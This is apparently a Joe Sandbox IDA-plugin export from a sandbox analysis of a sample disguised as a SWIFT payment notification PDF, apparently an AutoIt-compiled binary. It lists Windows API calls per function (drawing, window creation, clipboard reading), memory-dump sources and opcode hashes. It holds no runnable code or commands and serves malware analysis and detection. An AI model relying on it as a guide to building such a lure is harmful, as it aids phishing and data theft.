                                                                                                                              • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                              • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                                              • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                              • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                                              APIs
                                                                                                                              • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                                              • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                                              • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                                              • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                                              • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                                              • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                                              • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                                              • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                                              • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                                              • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                                                • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 69173610-0
                                                                                                                              • Opcode ID: bb466bd94b3d06938b7018b5b6511764efcc4f58ae68c14523a7898399b48cb1
                                                                                                                              • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                                              • Opcode Fuzzy Hash: bb466bd94b3d06938b7018b5b6511764efcc4f58ae68c14523a7898399b48cb1
                                                                                                                              • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                                              APIs
                                                                                                                              • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                                              • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                                              • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                                              • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                                              • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                              • API String ID: 2910397461-517079104
                                                                                                                              • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                              • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                                              • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                              • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                                              APIs
                                                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                                              • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                                              • SetCursor.USER32(00000000), ref: 00430773
                                                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                                              • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                                              • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                                              • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                                              • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                                              • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                                              • SetCursor.USER32(00000000), ref: 00430803
                                                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                                              • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                                              • SetCursor.USER32(00000000), ref: 00430833
                                                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                                              • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                                              • SetCursor.USER32(00000000), ref: 00430863
                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                                              • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                                              • SetCursor.USER32(00000000), ref: 00430887
                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                                              • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Cursor$Load
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1675784387-0
                                                                                                                              • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                              • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                                              • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                              • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                                              APIs
                                                                                                                              • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                              • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                                              • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                              • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                              • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                                              • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                              • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                              • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                              • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                                              • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                                              • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                                              • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                                              • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                                              • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                                              • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                                              • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                                              • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                                              • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1582027408-0
                                                                                                                              • Opcode ID: bf960579c9dcb6ff352736653e7288f5ecf822fd32145f033a9cce0aa6ed1ab8
                                                                                                                              • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                                              • Opcode Fuzzy Hash: bf960579c9dcb6ff352736653e7288f5ecf822fd32145f033a9cce0aa6ed1ab8
                                                                                                                              • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                                              APIs
                                                                                                                              • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                                              • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                                              • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                                              • DestroyWindow.USER32(?), ref: 00456746
                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                                              • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                                              • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                                              • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                                              • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                                              • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                                              • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                              • String ID: ($,$tooltips_class32
                                                                                                                              • API String ID: 225202481-3320066284
                                                                                                                              • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                              • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                                              • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                              • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                                              APIs
                                                                                                                              • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                              • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                              • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                              • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                              • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 15083398-0
                                                                                                                              • Opcode ID: c1334997229f77db4b11d19c1487f326394a263a26d39f21c0988453c07de84a
                                                                                                                              • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                                              • Opcode Fuzzy Hash: c1334997229f77db4b11d19c1487f326394a263a26d39f21c0988453c07de84a
                                                                                                                              • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                                              APIs
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                                              • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                                              • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                                              • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                                              • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                                              • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                                              • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                                              • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                                              • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer
                                                                                                                              • String ID: @$AutoIt v3 GUI
                                                                                                                              • API String ID: 2872485747-3359773793
                                                                                                                              • Opcode ID: f09f2a2b6cca380f9ede19f0122a88a3538efa9583e86f2b72b74e79f194809b
                                                                                                                              • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                                              • Opcode Fuzzy Hash: f09f2a2b6cca380f9ede19f0122a88a3538efa9583e86f2b72b74e79f194809b
                                                                                                                              • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6ea4eb680e8cf99482c1c750637daaf0226b08b42397e9a655db76a49ca7d864
                                                                                                                              • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                                                              • Opcode Fuzzy Hash: 6ea4eb680e8cf99482c1c750637daaf0226b08b42397e9a655db76a49ca7d864
                                                                                                                              • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                                                              APIs
                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 2353593579-4108050209
                                                                                                                              • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                              • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                                                              • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
